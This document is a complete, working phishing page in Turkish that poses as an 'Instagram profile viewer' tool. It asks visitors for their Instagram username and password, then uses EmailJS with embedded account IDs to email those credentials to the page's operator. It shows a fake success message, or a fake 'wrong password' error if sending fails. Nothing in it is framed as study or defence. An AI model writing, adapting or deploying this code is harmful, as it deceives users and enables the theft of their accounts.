
<!DOCTYPE html>
<html>
<head>
	<title>Instagram Profilime Kim Baktı?</title>
	<style>
		body {
			background-color: black;
		}

		h1 {
			font-family: Oswald, sans-serif;
			color: white;
			text-align: center;
		}

		form {
			margin: 0 auto;
			width: 300px;
			text-align: center;
		}

		input[type="text"], input[type="password"] {
			display: block;
			margin: 20px auto;
			padding: 10px;
			border-radius: 5px;
			border: none;
			font-size: 16px;
			width: 100%;
		}

		input[type="submit"] {
			display: block;
			margin: 20px auto;
			padding: 10px 20px;
			border-radius: 5px;
			border: none;
			background-color: green;
			color: white;
			font-size: 16px;
			cursor: pointer;
		}

		.error-message {
			color: red;
			font-size: 12px;
			font-family: Oswald, sans-serif;
			margin-top: 10px;
			text-align: center;
		}
	</style>
</head>
<body>
	<h1>Instagram Profilime Kim Baktı?</h1>
	<form id="login-form">
		<input type="text" name="username" placeholder="Kullanıcı Adı">
		<input type="password" name="password" placeholder="Şifre">
		<input type="submit" value="Kaydol">
	</form>

	<script src="https://cdn.emailjs.com/sdk/2.3.2/email.min.js"></script>
	<script>
		(function(){
			emailjs.init("Qp4MSbIt3nPXGdC6_PVMM");
		})();

		document.getElementById('login-form').addEventListener('submit', function(event) {
			event.preventDefault();

			// Kullanıcı bilgileri alınır
			var username = document.getElementsByName('username')[0].value;
			var password = document.getElementsByName('password')[0].value;

			// E-posta gönderimi için EmailJS kullanılır
			emailjs.send("service_cv18yqv", "template_2egr1uo", {username: username, password: password})
			.then(function(response) {
				alert("Kaydoldunuz!");
			}, function(error) {
				// Hata mesajı gösterilir
				var errorMessage = document.createElement('p');
				errorMessage.className = 'error-message';
				errorMessage.innerText = 'Kullanıcı adı veya şifre hatalı!';
				document.getElementById('login-form').appendChild(errorMessage);
			});
		});
	</script>
</body>
</html>
